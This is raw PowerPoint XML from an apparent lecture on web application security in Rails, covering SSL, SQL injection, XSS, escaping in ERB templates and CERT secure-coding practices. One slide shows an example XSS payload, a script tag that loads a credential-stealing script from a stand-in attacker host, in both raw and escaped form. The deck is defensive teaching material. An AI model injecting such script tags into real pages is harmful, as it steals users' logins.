            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3748088" y="825500"/>
            <a:ext cx="6918325" cy="603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19276" y="5337175"/>
            <a:ext cx="8389937" cy="954088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bg1">
                <a:lumMod val="65000"/>
                <a:lumOff val="35000"/>
              </a:schemeClr>
            </a:solidFill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800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blah blah…</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script src="http://mallorysevilsite.com/authstealer.js"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5991225" y="2725738"/>
            <a:ext cx="1612900" cy="2767012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2595686"/>
              <a:gd name="connsiteY0" fmla="*/ 1557477 h 1557477"/>
              <a:gd name="connsiteX1" fmla="*/ 954842 w 2595686"/>
              <a:gd name="connsiteY1" fmla="*/ 389369 h 1557477"/>
              <a:gd name="connsiteX2" fmla="*/ 2595686 w 2595686"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 155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5686" h="1557477">
                <a:moveTo>
                  <a:pt x="0" y="1557477"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="261114" y="1103212"/>
                  <a:pt x="522228" y="648948"/>
                  <a:pt x="954842" y="389369"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1387456" y="129789"/>
                  <a:pt x="2309852" y="71075"/>
                  <a:pt x="2595686" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="57150" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF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Left Brace 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5695156" y="1693069"/>
            <a:ext cx="584200" cy="8221662"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="5715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How to prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>cross-site scripting (XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>?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How to prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>cross-site scripting (XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/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Use Rails!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Hartl: “Rails automatically prevents the [XSS] problem by escaping any content inserted into view templates.”</a:t>
            </a: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2057401" y="3198814"/>
            <a:ext cx="8074025" cy="2619375"/>
            <a:chOff x="534718" y="3198048"/>
            <a:chExt cx="8074571" cy="2620339"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1480932" y="3198048"/>
              <a:ext cx="6182143" cy="4001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prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>&lt;script </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>="http://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>mallorysevilsite.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>authstealer.js</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>"&gt;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4718" y="5418190"/>
              <a:ext cx="8074571" cy="4001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FF00FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>script</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>quot;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>http</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>mallorysevilsite.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>authstealer.js</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>&amp;quot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>;&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>gt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>;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4200503" y="3598245"/>
              <a:ext cx="0" cy="1819945"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF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900" name="TextBox 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4338518" y="4036122"/>
              <a:ext cx="3216798" cy="954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>
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ERB translates variable values to…</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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2495551" y="3495676"/>
            <a:ext cx="7261225" cy="2011363"/>
            <a:chOff x="973382" y="3495054"/>
            <a:chExt cx="7261021" cy="2011742"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="973382" y="3495054"/>
              <a:ext cx="639744" cy="2011742"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF00FF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2475115" y="3495054"/>
              <a:ext cx="347652" cy="2011742"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF00FF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396227" y="3495054"/>
              <a:ext cx="266693" cy="2011742"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF00FF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7527985" y="3523634"/>
              <a:ext cx="706418" cy="1983162"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF00FF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Three Common Web App Attacks and Countermeasures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612" y="1600201"/>
            <a:ext cx="8389938" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attack:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Eavesdropping on network communications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Countermeasure:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Encrypt communications with SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attack:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Countermeasure:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Use escaped queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attack:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Cross-site scripting (another type of injection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Countermeasure:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Use Rails (escape text)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522412" y="4822825"/>
            <a:ext cx="9144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FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Although these attacks are common,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>there are many more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FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(e.g., cross-site request forgery –</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hartl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Ch. 3)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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979612" y="-6350"/>
            <a:ext cx="82296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CERT Top 10 Software Security Practices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39938" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979612" y="1025525"/>
            <a:ext cx="8229600" cy="5360988"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="Calibri" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Validate input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 altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Heed compiler warnings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 altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Architect and design for security policies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 altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Keep it simple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 altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Default deny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 altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Adhere to the principle of least privilege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 altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Sanitize data sent to other software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 altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Practice defense in depth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 altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Use effective quality assurance techniques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 altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Adopt a software construction security standard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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7461251" y="6581776"/>
            <a:ext cx="32099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>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Taken from https://www.securecoding.cert.org/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>
          <a:xfrm>
            <a:off x="1979612" y="1216025"/>
            <a:ext cx="8229600" cy="2757488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For more attacks and countermeasures, see the Rails Security Guide</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>guides.rubyonrails.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>security.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FFFF"/>
              </a:solidFill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80A1-7333-314C-9306-DE5F3BA1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8C582-3216-C14B-B4CE-C68DDA558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Encrypting communication with SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CERT security practices</a:t>
            </a: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FE791DFE-8736-1E4E-8AD4-48C253D58AB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1522412" y="4737100"/>
            <a:ext cx="9215438" cy="2139950"/>
            <a:chOff x="0" y="4737100"/>
            <a:chExt cx="9215438" cy="2139950"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71E58E72-DE6D-5642-89AF-34926130E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23" b="12630"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="4737100"/>
              <a:ext cx="9144000" cy="212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0526F5-C9E0-9441-8D97-183B0F9A3208}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7632700" y="6599238"/>
              <a:ext cx="1582738" cy="2778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  <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                </a:rPr>
                <a:t>http://flic.kr/p/aCLor3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865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41412" y="2362200"/>
            <a:ext cx="9601200" cy="11430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Breach the Website and the Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229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7245" y="452895"/>
            <a:ext cx="5471005" cy="1783249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84730" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="10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srgbClr val="001F5F"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-30" dirty="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srgbClr val="001F5F"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="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srgbClr val="001F5F"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-60" dirty="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srgbClr val="001F5F"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001F5F"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> Principles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defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="001F5F"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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570059" lvl="1" indent="-215200" defTabSz="914126">
              <a:buSzPct val="109090"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="570694" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Understanding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="2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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="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srgbClr val="FFC000"/>
                </a:solidFill>
